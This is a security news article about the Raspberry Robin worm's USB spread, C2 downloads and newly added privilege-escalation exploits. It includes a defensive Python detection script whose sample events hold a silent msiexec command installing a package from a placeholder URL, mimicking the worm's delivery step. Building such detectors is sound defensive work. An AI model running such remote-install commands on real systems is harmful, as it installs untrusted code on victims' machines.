Raspberry Robin Worm Incorporates Two New 1-Day LPE Exploits

February 11, 2024

Raspberry Robin, a Windows worm, was discovered by Red Canary's cybersecurity researchers. The worm spreads through removable USB devices and uses Windows Installer to reach out to domains associated with QNAP and download a malicious DLL. If the primary C2 infrastructure fails, the malware uses TOR exit nodes as a backup.

The worm was first noticed in September 2021, predominantly targeting organizations within the technology and manufacturing sectors. The initial infection usually occurs through infected removable drives, particularly USB devices. The malware employs cmd.exe to read and execute a file stored on the infected external drive, while it uses msiexec.exe to communicate with a rogue domain serving as a C2 to download and install a DLL library file.
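As an added illustration, not code from the report or from Red Canary or Check Point, the script below runs detection rules derived from the delivery chain described above (cmd.exe executing content from a removable drive, msiexec.exe fetching a remote package, and the parent-child link between them) over constructed process-creation events. The event schema, the removable drive letter and the URL are assumptions, not indicators from the report.

```python
import json
import re

# Constructed sample events (JSON lines) in a simplified process-creation schema.
# Paths, drive letter and URL are placeholders, not indicators from the report.
SAMPLE_EVENTS = r"""
{"pid": 41, "ppid": 7, "image": "cmd.exe", "cmdline": "cmd.exe /R type E:\\update.lnk"}
{"pid": 42, "ppid": 41, "image": "msiexec.exe", "cmdline": "msiexec.exe /q /i http://placeholder.invalid:8080/pkg.msi"}
{"pid": 43, "ppid": 7, "image": "msiexec.exe", "cmdline": "msiexec.exe /i C:\\Users\\alice\\Downloads\\tool.msi"}
{"pid": 44, "ppid": 1, "image": "svchost.exe", "cmdline": "svchost.exe -k netsvcs"}
"""

# Assumption: drive letters the host has enumerated as removable media.
REMOVABLE_DRIVES = {"E"}
DRIVE_RE = re.compile(r"(?<![A-Za-z])([A-Za-z]):\\")
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


def parse_events(text):
    """Parse JSON-lines process events, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def detect(events):
    """Return (rule_name, pid) tuples for events matching the delivery chain."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        image, cmd = e["image"].lower(), e["cmdline"]
        # Rule 1: cmd.exe referencing a path on a removable drive.
        drives = {m.upper() for m in DRIVE_RE.findall(cmd)}
        if image == "cmd.exe" and drives & REMOVABLE_DRIVES:
            findings.append(("cmd_reads_removable_drive", e["pid"]))
        # Rule 2: msiexec.exe installing from a URL instead of a local file.
        if image == "msiexec.exe" and URL_RE.search(cmd):
            findings.append(("msiexec_remote_package", e["pid"]))
            # Rule 3: that msiexec.exe was spawned by cmd.exe (full chain).
            parent = by_pid.get(e["ppid"])
            if parent and parent["image"].lower() == "cmd.exe":
                findings.append(("cmd_to_msiexec_remote_chain", e["pid"]))
    return findings


if __name__ == "__main__":
    for rule, pid in detect(parse_events(SAMPLE_EVENTS)):
        print(f"{rule}: pid {pid}")
```

A local msiexec.exe install from a file path (pid 43) is not flagged, so the rules hinge on the remote URL and the removable-drive origin rather than on msiexec.exe alone.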

Check Point researchers have detailed the worm's evolution, noting that the Raspberry Robin authors have integrated two new 1-day LPE exploits. The researchers believe that the operators either have access to an exploit seller or have developed the exploits themselves. They observed that Raspberry Robin is consistently updated with new features and supports new evasion capabilities.

The malware has also altered its communication method and lateral movement to avoid detection. It is now spreading by disguising itself as a legitimate Windows component. As stated in the report published by Check Point, “Since last October, we have seen large waves of attacks against our customers worldwide. Since our last report, it is clear that Raspberry Robin hasn’t stopped implementing new features and tricks that make it even harder to analyze.”

The report also highlights that Raspberry Robin continues to use different exploits for vulnerabilities either before or only a short time after they were publicly disclosed. These 1-day exploits were not publicly disclosed at the time of their use. One of these vulnerabilities, CVE-2023-36802, was also used in the wild as a 0-day and was sold on the Dark Web.

The CVE-2023-36802 vulnerability is a Type Confusion issue in Microsoft Streaming Service Proxy. A local attacker can exploit this flaw to escalate privileges to SYSTEM. This vulnerability was disclosed in September, but researchers reported it had been exploited in the wild as a zero-day for some time before that disclosure. An exploit for this vulnerability was available for sale on Dark Web forums in February 2023, and Raspberry Robin started using it in October 2023.

In addition to CVE-2023-36802, the operators also used an exploit for CVE-2023-29360. The exploit for this vulnerability was publicly disclosed in June, and Raspberry Robin employed it in August. The researchers conclude that Raspberry Robin operators have likely purchased the 1-day exploits from an exploit developer.
